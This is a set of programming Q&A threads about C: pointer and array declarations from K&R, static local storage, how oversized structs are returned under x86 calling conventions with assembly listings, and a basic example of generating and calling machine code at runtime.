Pointers and Pointer Functions - c

Studying the K&R book in C I had a few questions regarding complicated pointer declarations and pointer-array relationships.
1) What exactly is the difference between
char amessage[] = "this is a string";
and
char *pmessage;
pmessage = "this is a string";
and when would you use one or the other?
From my understanding the first one allocates some amount of memory according to the size of the string, and then stores the chars in the memory. Then when you access amessage[] you just directly access whatever char you're looking for. For the second one you also allocate memory except you just access the data through a pointer whenever you need it. Is this the correct way of looking at it?
2) The book says that arrays when passed into functions are treated as if you gave the pointer to the first index of the array and thus you manipulate the array through manipulating the pointer even though you can still do syntax like a[i]. Is this true if you just created an array somewhere and want to access it or is it only true if you pass in an array into a function? For example:
char amessage[]= "hi";
char x = *(amessage + 1); // can I do this?
3) The book says the use of static is great in this particular function:
/* month_name: return name of n-th month */
char *month_name(int n)
{
static char *name[] = {
"Illegal month",
"January", "February", "March",
"April", "May", "June",
"July", "August", "September",
"October", "November", "December"
};
return (n < 1 || n > 12) ? name[0] : name[n];
}
I don't understand why exactly this is a good use of static. Is it because the char *name[] would get deleted after function return if it is not static (because its a local variable)? Then does that mean in c you can't do stuff like:
int testFunction(){
int x = 1;
return x;
}
Without x being deleted before you use the return value? (Sorry I guess this might not be a pointer question but it was in the pointer chapter).
4) There are some complicated declaration like
char (*(*x())[])()
I'm really confused as to what is going on. So the x() part means a function x that returns a pointer? But what kind of pointer does it return, it's just a "*" without like int or void or w/e. Or does that mean a pointer to a function (but I thought that would be like (*x)())? And then after you add brackets (because I assume brackets have the next precedence)...what is that? An array of functions?
This kind of ties to my confusion with function pointers. If you have something like
int (*func)()
That means a pointer to a function that returns an int, and the name of that pointer is func, but what does it mean when its like int (*x[3])(). I don't understand how you can replace the pointer name with an array.
Thanks for any help!
Kevin

1) What exactly is the difference between
char amessage[] = "this is a string";
and
char *pmessage;
pmessage = "this is a string";
and when would you use one or the other?
amessage will always refer to the memory holding this is a string\0. You cannot change the address it refers to. pmessage can be updated to point to any character in memory, whether or not it is part of a string. If you assign to pmessage, you might lose your only reference to this is a string\0. (It depends if you made references anywhere else.)
I would use char amessage[] if I intended to modify the contents of amessage[] in place. You must not modify the string literal that pmessage points to: doing so is undefined behavior, and on most modern systems the literal lives in read-only memory. Try this little program; comment out amessage[0]='H'; and pmessage[0]='H'; one at a time and see that pmessage[0]='H'; typically causes a segmentation violation:
#include <stdio.h>
int main(int argc, char* argv[]) {
char amessage[]="howdy";
char *pmessage="hello";
amessage[0]='H';
pmessage[0]='H';
printf("amessage %s\n", amessage);
printf("pmessage %s\n", pmessage);
return 0;
}
Modifying a string that was hard-coded in the program is relatively rare; char *foo = "literal"; is probably more common, and the immutability of the string might be one reason why.
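To make the difference concrete, here is a minimal sketch assuming a hosted C99 compiler. The function name array_vs_pointer is made up for illustration and is not from K&R. The array owns a writable copy of the characters, while the pointer only refers to a literal, although the pointer itself can be re-aimed:

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical demo function; returns sizeof the array for inspection. */
size_t array_vs_pointer(void)
{
    char amessage[] = "this is a string";      /* writable copy: 16 chars + '\0' */
    const char *pmessage = "this is a string"; /* points at a string literal */

    amessage[0] = 'T';              /* fine: the array is ours to modify */
    assert(amessage[0] == 'T');

    /* pmessage[0] = 'T'; is rejected by the compiler because of const;
       without const it would compile but be undefined behavior. */

    pmessage = amessage + 5;        /* fine: a pointer can be re-aimed */
    assert(strcmp(pmessage, "is a string") == 0);

    /* amessage = pmessage; would not compile: an array is not assignable. */

    return sizeof amessage;         /* size of the whole array, not of a pointer */
}
```

Declaring the pointer as const char * is a design choice rather than a requirement: it lets the compiler catch the write that would otherwise crash at run time.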
2) The book says that arrays when passed into functions are treated as
if you gave the pointer to the first index of the array and thus you
manipulate the array through manipulating the pointer even though you
can still do syntax like a[i]. Is this true if you just created an
array somewhere and want to access it or is it only true if you pass
in an array into a function? For example:
char amessage[]= "hi";
char x = *(amessage + 1); // can I do this?
You can do that, however it is pretty unusual:
$ cat refer.c
#include <stdio.h>
int main(int argc, char* argv[]) {
char amessage[]="howdy";
char x = *(amessage+1);
printf("x: %c\n", x);
return 0;
}
$ ./refer
x: o
$
At least, I have never seen a "production" program that did this with character strings. (And I'm having trouble thinking of a program that used pointer arithmetic rather than array subscripting on arrays of other types.)
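For what it's worth, a[i] is defined by the language as *(a + i), so the two spellings are interchangeable anywhere, not only inside a function that received the array as an argument. A small sketch, with helper names (char_at, count_chars) invented for illustration:

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical helper: reads the i-th character both ways and
   checks that the two spellings agree. */
char char_at(const char *s, size_t i)
{
    char by_index   = s[i];
    char by_pointer = *(s + i);
    assert(by_index == by_pointer);
    return by_pointer;
}

/* Counts characters by walking a pointer, in the style K&R uses
   for its pointer version of strlen. */
size_t count_chars(const char *s)
{
    const char *p = s;
    while (*p != '\0')
        p++;
    return (size_t)(p - s);
}
```

Calling char_at(amessage, 1) on an array holding "howdy" gives 'o', the same character the refer.c session above prints.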
3) The book says the use of static is great in this particular
function:
/* month_name: return name of n-th month */
char *month_name(int n)
{
static char *name[] = {
"Illegal month",
"January", "February", "March",
"April", "May", "June",
"July", "August", "September",
"October", "November", "December"
};
return (n < 1 || n > 12) ? name[0] : name[n];
}
I don't understand why exactly this is a good use of static. Is it
because the char *name[] would get deleted after function return if
it is not static (because its a local variable)? Then does that mean
in c you can't do stuff like:
int testFunction(){
int x = 1;
return x;
}
Without x being deleted before you use the return value? (Sorry I
guess this might not be a pointer question but it was in the pointer
chapter).
In this specific case, I believe the static is not needed for correctness: the function returns one of the pointers stored in name[], not a pointer to name[] itself, and string literals have static storage duration whether or not the array does (GCC stores them in the .rodata read-only data segment). Your example with a primitive data type (int) also works fine because C passes everything by value, both on function calls and on function returns. However, if you're returning a pointer to an object allocated on the stack, then the static is absolutely necessary, because it determines where in memory the object lives:
$ cat stackarray.c ; make stackarray
#include <stdio.h>
struct foo { int x; };
struct foo *bar() {
struct foo array[2];
array[0].x=1;
array[1].x=2;
return &array[1];
}
int main(int argc, char* argv[]) {
struct foo* fp;
fp = bar();
printf("foo.x: %d\n", fp->x);
return 0;
}
cc stackarray.c -o stackarray
stackarray.c: In function ‘bar’:
stackarray.c:9:2: warning: function returns address of local variable
If you change the storage duration of array to static, then the address that is being returned is not automatically allocated, and will continue to work even after the function has returned:
$ cat staticstackarray.c ; make staticstackarray ; ./staticstackarray
#include <stdio.h>
struct foo { int x; };
struct foo *bar() {
static struct foo array[2];
array[0].x=1;
array[1].x=2;
return &array[1];
}
int main(int argc, char* argv[]) {
struct foo* fp;
fp = bar();
printf("foo.x: %d\n", fp->x);
return 0;
}
cc staticstackarray.c -o staticstackarray
foo.x: 2
You can see where the memory allocation changes between stackarray and staticstackarray:
$ readelf -S stackarray | grep -A 3 '\.data'
[24] .data PROGBITS 0000000000601010 00001010
0000000000000010 0000000000000000 WA 0 0 8
[25] .bss NOBITS 0000000000601020 00001020
0000000000000010 0000000000000000 WA 0 0 8
$ readelf -S staticstackarray | grep -A 3 '\.data'
[24] .data PROGBITS 0000000000601010 00001010
0000000000000010 0000000000000000 WA 0 0 8
[25] .bss NOBITS 0000000000601020 00001020
0000000000000018 0000000000000000 WA 0 0 8
The .bss section in the version without static is 8 bytes smaller than the .bss section in the version with static. Those 8 bytes in the .bss section provide the persistent address that is returned.
So you can see that the case with strings didn't really make a difference -- at least GCC doesn't care -- but for pointers to other types of objects, the static makes all the difference in the world.
However, most functions that return data in function-local-static storage have fallen out of favor. strtok(3), for example, extracts tokens from a string, and subsequent calls to strtok(3) pass NULL as the first argument to indicate that the function should re-use the string passed in the first call. This is neat, but means a program can never tokenize two separate strings simultaneously, and multi-threaded programs cannot reliably use this routine. So a reentrant version is available, strtok_r(3), that takes an additional argument to store information between calls. man -k _r will show a surprising number of functions that have reentrant versions available, and the primary change is reducing static use in functions.
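As a rough illustration of why the extra argument matters, the sketch below walks two comma-separated lists in lockstep, which plain strtok cannot do because it has only one hidden position. It assumes a POSIX system that provides strtok_r; the function name count_equal_fields is invented for this example:

```c
#define _POSIX_C_SOURCE 200809L   /* ask the headers to declare strtok_r */
#include <assert.h>
#include <string.h>

/* Hypothetical helper: counts the positions at which two comma-separated
   lists hold the same field. Both buffers are modified in place, as with
   any strtok-style tokenizer. */
int count_equal_fields(char *a, char *b)
{
    char *save_a = NULL;   /* per-string state that strtok keeps in a static */
    char *save_b = NULL;
    char *ta = strtok_r(a, ",", &save_a);
    char *tb = strtok_r(b, ",", &save_b);
    int equal = 0;

    while (ta != NULL && tb != NULL) {
        if (strcmp(ta, tb) == 0)
            equal++;
        ta = strtok_r(NULL, ",", &save_a);
        tb = strtok_r(NULL, ",", &save_b);
    }
    assert(equal >= 0);
    return equal;
}
```

Each tokenizer carries its own save pointer, so the two scans cannot disturb each other, and the same reasoning makes the function usable from several threads at once.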
4) There are some complicated declaration like
char (*(*x())[])()
I'm really confused as to what is going on. So the x() part means a
function x that returns a pointer? But what kind of pointer does it
return, it's just a "*" without like int or void or w/e. Or does that
mean a pointer to a function (but I thought that would be like
(*x)())? And then after you add brackets (because I assume brackets
have the next precedence)...what is that? An array of functions?
This kind of ties to my confusion with function pointers. If you have
something like
int (*func)()
That means a pointer to a function that returns an int, and the name
of that pointer is func, but what does it mean when its like int
(*x[3])(). I don't understand how you can replace the pointer name
with an array.
First, don't panic. You'll almost never need anything this complicated. Sometimes it is very handy to have a table of function pointers and call the next one based on a state transition diagram. Sometimes you're installing signal handlers with sigaction(2). You'll need slightly complicated function pointers then. However, if you use cdecl(1) to decipher what you need, it'll make sense:
struct sigaction {
void (*sa_handler)(int);
void (*sa_sigaction)(int, siginfo_t *, void *);
sigset_t sa_mask;
int sa_flags;
void (*sa_restorer)(void);
};
cdecl(1) only understands a subset of C native types, so replace siginfo_t with void and you can see roughly what is required:
$ cdecl
Type `help' or `?' for help
cdecl> explain void (*sa_sigaction)(int, void *, void *);
declare sa_sigaction as pointer to function
(int, pointer to void, pointer to void) returning void
Expert C Programming: Deep C Secrets has an excellent chapter devoted to understanding more complicated declarations, and even includes a version of cdecl, in case you wish to extend it to include more types and typedef handling. It's well worth reading.
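On the int (*x[3])() part of the question: the name is not replaced by an array; x is itself an array, and each of its three elements is a pointer to a function. A minimal sketch of such a table, with made-up function names (add, sub, mul, apply) and an assumed (int, int) parameter list:

```c
#include <assert.h>

static int add(int a, int b) { return a + b; }
static int sub(int a, int b) { return a - b; }
static int mul(int a, int b) { return a * b; }

/* ops is an array of 3 pointers to functions taking (int, int)
   and returning int. */
static int (*ops[3])(int, int) = { add, sub, mul };

/* Hypothetical dispatcher: picks a function from the table by index. */
int apply(int which, int a, int b)
{
    assert(which >= 0 && which < 3);
    return ops[which](a, b);   /* index the array, then call through the pointer */
}
```

This is the shape a state-machine or command table usually takes: the index selects the handler, and the call syntax is the same as for an ordinary function.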

This has to do with part 3 and is a kind of reply/addition to sarnold's comment. He's right in that with or without the static, the string literals are always going to be a part of the .data/.rodata segment and essentially only created once. However, without the use of the word static, the actual array, that is the array of char pointers, will in fact be created on the stack each time the function is called.
With the use of static:
Dump of assembler code for function month_name:
0x08048394 <+0>: push ebp
0x08048395 <+1>: mov ebp,esp
0x08048397 <+3>: cmp DWORD PTR [ebp+0x8],0x0
0x0804839b <+7>: jle 0x80483a3 <month_name+15>
0x0804839d <+9>: cmp DWORD PTR [ebp+0x8],0xc
0x080483a1 <+13>: jle 0x80483aa <month_name+22>
0x080483a3 <+15>: mov eax,ds:0x8049720
0x080483a8 <+20>: jmp 0x80483b4 <month_name+32>
0x080483aa <+22>: mov eax,DWORD PTR [ebp+0x8]
0x080483ad <+25>: mov eax,DWORD PTR [eax*4+0x8049720]
0x080483b4 <+32>: pop ebp
0x080483b5 <+33>: ret
Without the use of static:
Dump of assembler code for function month_name:
0x08048394 <+0>: push ebp
0x08048395 <+1>: mov ebp,esp
0x08048397 <+3>: sub esp,0x40
0x0804839a <+6>: mov DWORD PTR [ebp-0x34],0x8048514
0x080483a1 <+13>: mov DWORD PTR [ebp-0x30],0x8048522
0x080483a8 <+20>: mov DWORD PTR [ebp-0x2c],0x804852a
0x080483af <+27>: mov DWORD PTR [ebp-0x28],0x8048533
0x080483b6 <+34>: mov DWORD PTR [ebp-0x24],0x8048539
0x080483bd <+41>: mov DWORD PTR [ebp-0x20],0x804853f
0x080483c4 <+48>: mov DWORD PTR [ebp-0x1c],0x8048543
0x080483cb <+55>: mov DWORD PTR [ebp-0x18],0x8048548
0x080483d2 <+62>: mov DWORD PTR [ebp-0x14],0x804854d
0x080483d9 <+69>: mov DWORD PTR [ebp-0x10],0x8048554
0x080483e0 <+76>: mov DWORD PTR [ebp-0xc],0x804855e
0x080483e7 <+83>: mov DWORD PTR [ebp-0x8],0x8048566
0x080483ee <+90>: mov DWORD PTR [ebp-0x4],0x804856f
0x080483f5 <+97>: cmp DWORD PTR [ebp+0x8],0x0
0x080483f9 <+101>: jle 0x8048401 <month_name+109>
0x080483fb <+103>: cmp DWORD PTR [ebp+0x8],0xc
0x080483ff <+107>: jle 0x8048406 <month_name+114>
0x08048401 <+109>: mov eax,DWORD PTR [ebp-0x34]
0x08048404 <+112>: jmp 0x804840d <month_name+121>
0x08048406 <+114>: mov eax,DWORD PTR [ebp+0x8]
0x08048409 <+117>: mov eax,DWORD PTR [ebp+eax*4-0x34]
0x0804840d <+121>: leave
0x0804840e <+122>: ret
As you can see in the second example (without static), the array is allocated on the stack each time:
0x08048397 <+3>: sub esp,0x40
and the pointers are loaded into the array:
0x0804839a <+6>: mov DWORD PTR [ebp-0x34],0x8048514
0x080483a1 <+13>: mov DWORD PTR [ebp-0x30],0x8048522
...
So there's obviously a little more to be set up each time the function is called if you decide not to use static.

3) It has nothing to do with that - static creates the array once, as opposed to creating it every time the function runs. Since the data in the array never changes, it is more efficient not to re-create it every time. Your example function would work fine, every time. It's a value. It won't be deleted before you can return it. That would be very unintuitive.
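A small sketch of both halves of that statement, using invented function names (next_id, fresh_id, demo_ids): a static local is set up once and keeps its value between calls, while an automatic local is re-created on every call yet can still be returned safely because the return is by value.

```c
#include <assert.h>

int next_id(void)
{
    static int id = 0;  /* initialized once, before the program starts */
    return ++id;        /* the value persists between calls */
}

int fresh_id(void)
{
    int id = 0;         /* re-created and re-initialized on every call */
    return ++id;        /* returned by value, so the caller gets a safe copy */
}

/* Hypothetical self-check of the two behaviours. */
void demo_ids(void)
{
    int first = next_id();
    int second = next_id();
    assert(second == first + 1);       /* static: state carried over */
    assert(fresh_id() == fresh_id());  /* automatic: always starts over */
}
```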

4) Adding some more information in the reply for the 4) point:
I'm following this book to learn C: C for pascal Programmers by Norman J. Landis. It's quite old and is meant as a bridge from Pascal to C, but I find it very useful, complete, and explained down to the lowest level of the machine. For me it's an awesome book.
Chapter 5.3.1 in Appendix A talks about precisely this. (Blockquotes are content extracted from the book.)
Definition of base type:
The type specifier appearing in the declaration containing the declarator is called the base type
Basically, in bool x => bool is the base type and in int x[] => the base type for the array is int and the base type for the x is array of int.
In order to interpret complex declarators, the following rules apply:
Apply asterisk operators first.
Apply the "function of base type"( () ) and "array of returning base type" ( [] ) operators afterward, from right to left.
Of course, parentheses may enclose a declarator to alter the order of evaluation.
The book uses the same example, with the letter w in place of x:
How I 'parse' this: char (*(*w())[])();
I work from the outside of the parentheses inward, applying the two rules above at each level. Steps:
Outside any parentheses, we find the function declarator. So far, then, we have a function returning a char.
Now we enter the parentheses and process the pointer first and the array second.
The pointer is a pointer to "the upper base type", which is a function
returning a char. So far, then, we have a pointer to a function returning a char.
Next comes the array, which is an array of "the upper base type". And "the upper base type" = pointer to function returning a char.
Now, going into the innermost parentheses, we find a pointer and a function. In the same manner, the pointer comes first and the function second.
We process the pointer => pointer to an array of pointers to functions returning a char.
And finally the function declarator, and we get: function returning a pointer to an array of pointers to functions returning a char.
I hope it's much clearer now.
You'll need some time and practice to really understand and handle this, but once you get it, it's pretty easy ;)
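One way to check a reading like this is to build the same type out of typedefs and let the compiler confirm that the two spellings agree. The sketch below is only an illustration: the typedef and function names are invented, an array size of 2 is added so the table can be defined, and (void) parameter lists are added where the original has empty parentheses.

```c
#include <assert.h>

typedef char char_fn(void);        /* function returning char */
typedef char_fn *char_fn_ptr;      /* pointer to function returning char */
typedef char_fn_ptr fn_table[2];   /* array of pointers to functions returning char */

static char give_a(void) { return 'a'; }
static char give_b(void) { return 'b'; }

static fn_table table = { give_a, give_b };

/* w: function returning a pointer to an array of pointers to
   functions returning char, spelled with typedefs. */
fn_table *w(void) { return &table; }

/* The same type written as one raw declarator. */
char (*(*w_raw(void))[2])(void) { return &table; }

/* Call w, dereference the result to get the array, index it, call the entry. */
char call_entry(int i)
{
    assert(i >= 0 && i < 2);
    return (*w())[i]();
}
```

Both w and w_raw return &table without a cast, which only compiles because the typedef chain and the raw declarator name the same type.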

Related

How are oversized struct returned on the stack?

It is said that returning an oversized struct by value (as opposed to returning a pointer to the struct) from a function incurs unnecessary copy on the stack. By "oversized", I mean a struct that cannot fit in the return registers.
However, to quote Wikipedia
When an oversized struct return is needed, another pointer to a caller-provided space is prepended as the first argument, shifting all other arguments to the right by one place.
and
When returning struct/class, the calling code allocates space and passes a pointer to this space via a hidden parameter on the stack. The called function writes the return value to this address.
It appears that at least on x86 architectures, the struct in question is directly written by the callee to the memory appointed by the caller, so why would there be a copy then? Does returning oversized structs really incur copy on the stack?
If the function inlines, the copying through the return-value object can be fully optimized away. Otherwise, maybe not, and arg copying definitely can't be.
It appears that at least on x86 architectures, the struct in question is directly written by the callee to the memory appointed by the caller, so why would there be a copy then? Does returning oversized structs really incur copy on the stack?
It depends what the caller does with the return value; if it's assigned to a provably private object (escape analysis), that object can be the return-value object, passed as the hidden pointer.
But if the caller actually wants to assign the return value to other memory, then it does need a temporary.
struct large retval = some_func(); // no extra copying at all
*p = some_func(); // caller will make space for a local return-value object & copy.
(Unless the compiler knows that p is just pointing to a local struct large tmp;, and escape analysis can prove that there's no way some global variable could have a pointer to that same tmp var.)
long version, same thing with more details:
In the C abstract machine, there's a "return value object", and return foo copies the named variable foo to that object, even if it's a large struct. Or return (struct lg){1,2}; copies an anonymous struct. The return-value object itself is anonymous; nothing can take its address. (You can't int *p = &foo(123);). This makes it easier to optimize away.
In the caller, that anonymous return-value object can be assigned to whatever you want, which would be another copy if compilers didn't optimize anything. (All of this applies for any type, even int). Of course, compilers that aren't total garbage will avoid some, ideally all, of that copying, when doing so can't possibly change the observable results. And that depends on the design of the calling convention. As you say, most conventions, including all the mainstream x86 and x86-64 conventions, pass a "hidden pointer" arg for return values they choose not to return in register(s) for whatever reason (size, C++ having a non-trivial constructor).
struct large retval = foo(...);
For such calling conventions, the above code is effectively transformed to
struct large retval;
foo(&retval, ...);
So its C return-value object actually is a local in the stack-frame of its caller. foo() is allowed to store into that return-value object whenever it wants during execution, including before reading some other objects. This allows optimization within the callee (foo) as well, so a struct large tmp = ... / return tmp can be optimized away to just store into the return-value object.
So there's zero extra copying when the caller does just want to assign the function return value to a newly declared local var. (Or to a local var which it can prove is still private, via escape analysis. i.e. not pointed-to by any global vars).
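The transformation can be written out by hand to see that nothing is lost. This is only a source-level sketch of what such a calling convention does, not compiler output; the struct size and the names make_large, make_large_hidden and last_elements_match are chosen for illustration:

```c
#include <assert.h>

struct large { int data[64]; };   /* far too big for the return registers */

/* What the programmer writes: return by value. */
struct large make_large(int seed)
{
    struct large r;
    for (int i = 0; i < 64; i++)
        r.data[i] = seed + i;
    return r;
}

/* Roughly what a hidden-pointer convention turns it into: the caller
   passes the address of the return-value object as an extra argument. */
void make_large_hidden(struct large *ret, int seed)
{
    for (int i = 0; i < 64; i++)
        ret->data[i] = seed + i;
}

/* Hypothetical check that both spellings fill the object identically. */
int last_elements_match(int seed)
{
    struct large a = make_large(seed);   /* the hidden pointer can be &a */
    struct large b;
    make_large_hidden(&b, seed);         /* the same thing, spelled out */
    assert(a.data[0] == b.data[0]);
    return a.data[63] == b.data[63];
}
```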
But what if the caller wants to store the return value somewhere else?
void caller2(struct large *lgp) {
*lgp = foo();
}
Can *lgp be the return-value object, or do we need to introduce a local temporary?
void caller2(struct large *lgp) {
// foo_asm(lgp); // nope, possibly unsafe
struct large retval; foo(&retval); *lgp = retval; // safe
}
If you want functions to be able to write large structs to arbitrary locations, you have to "sign off" on it by making that effect visible in your source.
See What prevents the usage of a function argument as hidden pointer? for more details about why *lgp can't be the return-value object / hidden pointer, and another example. "A function is allowed to assume its return-value object (pointed-to by a hidden pointer) is not the same object as anything else". Also details of whether struct large *restrict lgp would make it safe: probably yes if the function doesn't longjmp (otherwise stores to the supposedly anonymous retval object might end up as visible side effects without return having been reached), but GCC doesn't look for that optimization.
Why is tailcall optimization not performed for types of class MEMORY? - return bar() where bar returns the same struct should be possible as an optimized tailcall, but that optimization is not performed. This can even introduce extra copying of the whole struct, as well as failing to optimize call bar / ret into jmp bar.
how c compiler treats a struct return value from a function, in ASM - thresholds for returning in registers. e.g. i386 System V always returns structs in memory, even struct {int x;};.
Is it possible within a function to get the memory address of the variable initialized by the return value?
C/C++ returning struct by value under the hood - an actual example (but unfortunately using debug-mode compiler-generated asm, so it contains copying that isn't necessary).
How do objects work in x86 at the assembly level? - example at the bottom of how x86-64 System V packs the bytes of a struct into RDX:RAX, or just RAX if it is 8 bytes or smaller.
An example showing early stores to the return-value object (instead of copying)
(all source + asm on the Godbolt compiler explorer)
// more or less extra size will get compilers to copy it around with SSE2 or not
struct large { int first, second; char pad[0];};
int *global_ptr;
extern int a;
NOINLINE // __attribute__((noinline))
struct large foo() {
struct large tmp = {1,2};
if (a)
tmp.second = *global_ptr;
return tmp;
}
(targeting GNU/Linux) clang -m32 -O3 -mregparm=1 creates an implementation that writes its return-value object before it's done reading everything else, exactly the case that would make it unsafe for the caller to pass a pointer to some globally-reachable memory.
The asm makes it clear that tmp is fully optimized away, or is the retval object.
# clang -O3 -m32 -mregparm=1
foo:
mov dword ptr [eax + 4], 2
mov dword ptr [eax], 1 # store tmp into the retval object
cmp dword ptr [a], 0
je .LBB0_2 # if (a == 0) goto ret
mov ecx, dword ptr [global_ptr] # load the global
mov ecx, dword ptr [ecx] # deref it
mov dword ptr [eax + 4], ecx # and store to the retval object
.LBB0_2:
ret
(-mregparm=1 means pass the first arg in EAX, less noisy and easier to quickly visually distinguish from stack space than passing on the stack. Fun fact: i386 Linux compiles the kernel with -mregparm=3. But fun fact #2: if a hidden pointer is passed on the stack (i.e. no regparm), that arg is callee pops, unlike the rest. The function will use ret 4 to do ESP+=4 after popping the return address into EIP.)
In a simple caller, the compiler just reserves some stack space, passes a pointer to it, and then can load member variables from that space.
int caller() {
struct large lg = {4, 5}; // initializer is dead, foo can't read its retval object
lg = foo();
return lg.second;
}
caller:
sub esp, 12
mov eax, esp
call foo
mov eax, dword ptr [esp + 4]
add esp, 12
ret
But with a less trivial caller:
int caller() {
struct large lg = {4, 5};
global_ptr = &lg.first;
// unknown(&lg); // or this: as a side effect, might set global_ptr = &tmp->first;
lg = foo(); // (except by inlining) the compiler can't know if foo() looks at global_ptr
return lg.second;
}
caller:
sub esp, 28 # reserve space for 2 structs, and alignment
mov dword ptr [esp + 12], 5
mov dword ptr [esp + 8], 4 # materialize lg
lea eax, [esp + 8]
mov dword ptr [global_ptr], eax # point global_ptr at it
lea eax, [esp + 16] # hidden first arg *not* pointing to lg
call foo
mov eax, dword ptr [esp + 20] # reload from the retval object
add esp, 28
ret
Extra copying with *lgp = foo();
int caller2(struct large *lgp) {
global_ptr = &lgp->first;
*lgp = foo();
return lgp->second;
}
# with GCC11.1 this time, SSE2 8-byte copying unlike clang
caller2: # incoming arg: struct large *lgp in EAX
push ebx #
mov ebx, eax # lgp, tmp89 # lgp needed after foo returns
sub esp, 24 # reserve space for a retval object (and waste 16 bytes)
mov DWORD PTR global_ptr, eax # global_ptr, lgp
lea eax, [esp+8] # hidden pointer to the retval object
call foo #
movq xmm0, QWORD PTR [esp+8] # 8-byte copy of both halves
movq QWORD PTR [ebx], xmm0 # *lgp_2(D), tmp86
mov eax, DWORD PTR [ebx+4] # lgp_2(D)->second, lgp_2(D)->second # reload int return value
add esp, 24
pop ebx
ret
The copy to *lgp needs to happen, but it's somewhat of a missed optimization to reload from there, instead of from [esp+12]. (Saves a byte of code size at the cost of more latency.)
Clang does the copy with two 4-byte integer register mov loads/stores, but one of them is into EAX so it already has the return value ready.
You might also want to look at the result of assigning to memory freshly allocated with malloc. Compilers know that nothing else can (legally) be pointing to the newly allocated memory: that would be use-after-free undefined behaviour. So they may allow passing on a pointer from malloc as the return-value object if it hasn't been passed to anything else yet.
Related fun fact: passing large structs by value always requires a copy (if the function doesn't inline). But as discussed in comments, the details depend on the calling convention. Windows differs from i386 / x86-64 System V calling conventions (all non-Windows OSes) on this:
SysV calling conventions copy the whole struct to the stack. (if they're too large to fit in a pair of registers for x86-64)
Windows x64 makes a copy and passes (like a normal arg) a pointer to that copy. The callee "owns" the arg and can modify it, so a tmp copy is still needed. (And no, const struct large foo has no effect.)
https://godbolt.org/z/ThMrE9rqT shows x86-64 GCC targeting Linux vs. x64 MSVC targeting Windows.
This really depends on your compiler, but in general the way this works is that the caller allocates the memory for the struct return value, but the callee also allocates stack space for any intermediate value of that structure. This intermediate allocation is used when the function is running, and then the struct is copied onto the caller's memory when the function returns.
For reference as to why your solution won't always work, consider a program which has two of the same struct and returns one based on some condition:
large_t returntype(int condition) {
large_t var1 = {5};
large_t var2 = {6};
// More intermediate code here
if(condition) return var1;
else return var2;
}
In this case, both may be required by the intermediate code, but the return value is not known at compile time, so the compiler doesn't know which to initialize on the caller's stack space. It's easier to just keep it local and copy on return.
EDIT: Your solution may be the case in simple functions, but it really depends on the optimizations performed by each individual compiler. If you're really interested in this, check out https://godbolt.org/

Generating functions at runtime in C

I would like to generate a function at runtime in C. And by this I mean I would essentially like to allocate some memory, point at it and execute it via function pointer. I realize this is a very complex topic and my question is naïve. I also realize there are some very robust libraries out there that do this (e.g. nanojit).
But I would like to learn the technique, starting with the basics. Could someone knowledgeable give me a very simple example in C?
EDIT: The answer below is great but here is the same example for Windows:
#include <Windows.h>
#define MEMSIZE 100*1024*1024
typedef void (*func_t)(void);
int main() {
HANDLE proc = GetCurrentProcess();
LPVOID p = VirtualAlloc(
NULL,
MEMSIZE,
MEM_RESERVE|MEM_COMMIT,
PAGE_EXECUTE_READWRITE);
func_t func = (func_t)p;
PDWORD code = (PDWORD)p;
code[0] = 0xC3; // ret
if(FlushInstructionCache(
proc,
NULL,
0))
{
func();
}
CloseHandle(proc);
VirtualFree(p, 0, MEM_RELEASE);
return 0;
}
As said previously by other posters, you'll need to know your platform pretty well.
Ignoring the issue of casting an object pointer to a function pointer being, technically, UB, here's an example that works for x86/x64 OS X (and possibly Linux too). All the generated code does is return to the caller.
#include <unistd.h>
#include <sys/mman.h>
typedef void (*func_t)(void);
int main() {
/*
* Get a RWX bit of memory.
* We can't just use malloc because the memory it returns might not
* be executable.
*/
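unsigned char *code = mmap(NULL, getpagesize(),
PROT_READ|PROT_EXEC|PROT_WRITE,
MAP_SHARED|MAP_ANON, -1, 0); /* portable code passes fd -1 for anonymous mappings */
if (code == MAP_FAILED)
return 1; /* the system refused to hand out RWX memory */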
/* Technically undefined behaviour */
func_t func = (func_t) code;
code[0] = 0xC3; /* x86 'ret' instruction */
func();
return 0;
}
Obviously, this will be different across different platforms but it outlines the basics needed: get executable section of memory, write instructions, execute instructions.
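The same three steps can be sketched with generated code that does slightly more than return. This version assumes Linux on x86 or x86-64 with glibc; the function name run_generated is invented, and it maps the page writable first and only then flips it to executable, which is a variation on the example above rather than the poster's method:

```c
#define _DEFAULT_SOURCE          /* for MAP_ANONYMOUS on glibc */
#include <assert.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

typedef int (*int_func_t)(void);

/* Hypothetical helper: builds "return 42" at run time and calls it.
   Returns -1 if the CPU is not x86 or the system refuses the mapping. */
int run_generated(void)
{
#if defined(__x86_64__) || defined(__i386__)
    static const unsigned char code[] = {
        0xB8, 0x2A, 0x00, 0x00, 0x00,   /* mov eax, 42 */
        0xC3                            /* ret */
    };
    size_t len = (size_t)sysconf(_SC_PAGESIZE);
    assert(sizeof code <= len);

    /* Step 1: get writable (not yet executable) memory. */
    unsigned char *mem = mmap(NULL, len, PROT_READ | PROT_WRITE,
                              MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED)
        return -1;

    /* Step 2: write the instructions. */
    memcpy(mem, code, sizeof code);

    /* Step 3: make the page readable and executable instead of writable. */
    if (mprotect(mem, len, PROT_READ | PROT_EXEC) != 0) {
        munmap(mem, len);
        return -1;
    }

    /* Step 4: call it. ISO C does not define this cast; it is a
       platform assumption, as noted in the answer above. */
    int_func_t fn = (int_func_t)mem;
    int result = fn();

    munmap(mem, len);
    return result;
#else
    return -1;   /* the byte sequence above is x86-only */
#endif
}
```

Writing first and enabling execution afterwards avoids asking for memory that is writable and executable at the same time, which some hardened systems refuse to provide.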
This requires you to know your platform. For instance, what is the C calling convention on your platform? Where are parameters stored? What register holds the return value? What registers must be saved and restored? Once you know that, you can essentially write some C code that assembles code into a block of memory, then cast that memory into a function pointer (though this is technically forbidden in ANSI C, and will not work if your platform marks those pages of memory as non-executable, aka the NX bit).
The simple way to go about this is simply to write some code, compile it, then disassemble it and look at what bytes correspond to which instructions. You can write some C code that fills allocated memory with that collection of bytes and then casts it to a function pointer of the appropriate type and executes.
It's probably best to start by reading the calling conventions for your architecture and compiler. Then learn to write assembly that can be called from C (i.e., follows the calling convention).
If you have tools, they can help you get some things right easier. For example, instead of trying to design the right function prologue/epilogue, I can just code this in C:
int foo(void* Data)
{
return (Data != 0);
}
